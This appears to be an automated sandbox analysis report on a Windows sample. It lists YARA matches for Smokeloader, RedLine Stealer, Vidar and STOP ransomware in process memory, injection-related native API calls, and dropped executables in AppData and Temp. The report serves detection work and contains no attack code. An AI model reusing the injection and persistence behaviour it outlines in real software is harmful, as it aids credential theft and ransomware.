Source: 00000000.00000002.356673245.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.504789684.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.444525144.0000000000889000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.458476037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000000.508110815.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000000.427534356.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.468200918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000000.510353848.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000F.00000002.466699994.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.442880266.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000E.00000002.469202987.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.540527249.0000000002E46000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.465494612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000000.430570444.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000000.434348709.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000000.426731802.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.466941491.0000000000819000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000000.415949040.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.550663724.0000000007290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000019.00000000.442875397.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.443176510.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.480385928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.461705193.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001E.00000002.535910271.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000C.00000002.542826089.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000013.00000002.474602203.0000000002370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.505917720.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.443497890.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000000.456775427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000000.428974978.00000000008C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.345197591.0000000004E61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.504609430.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: 5487.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: 5999.exe PID: 1244, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 5999.exe PID: 4888, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: String function: 0040EF58 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: String function: 048DE43F appears 44 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0040EF58 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040156B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402241 NtQuerySystemInformation, 0_2_00402241
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040224D NtQuerySystemInformation, 0_2_0040224D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402251 NtQuerySystemInformation, 0_2_00402251
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401577
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402219 NtQuerySystemInformation, 0_2_00402219
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040221B NtQuerySystemInformation, 0_2_0040221B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection, 0_2_00401727
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401581
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401584
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401587
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_0040156B
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00402241 NtQuerySystemInformation, 11_2_00402241
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040224D NtQuerySystemInformation, 11_2_0040224D
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00402251 NtQuerySystemInformation, 11_2_00402251
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401577
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00402219 NtQuerySystemInformation, 11_2_00402219
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_0040221B NtQuerySystemInformation, 11_2_0040221B
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401727 NtMapViewOfSection,NtMapViewOfSection, 11_2_00401727
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401581
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401584
Source: C:\Users\user\AppData\Roaming\uucbfdt Code function: 11_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 11_2_00401587
PE file contains executable resources (Code or Archives)
Source: file.exe Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 5999.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 405E.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 45DE.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 49F6.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 5487.exe.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: gecbfdt.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: uucbfdt.1.dr Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\uucbfdt Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@33/33@11/9
Source: C:\Users\user\AppData\Local\Temp\5487.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37F1.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
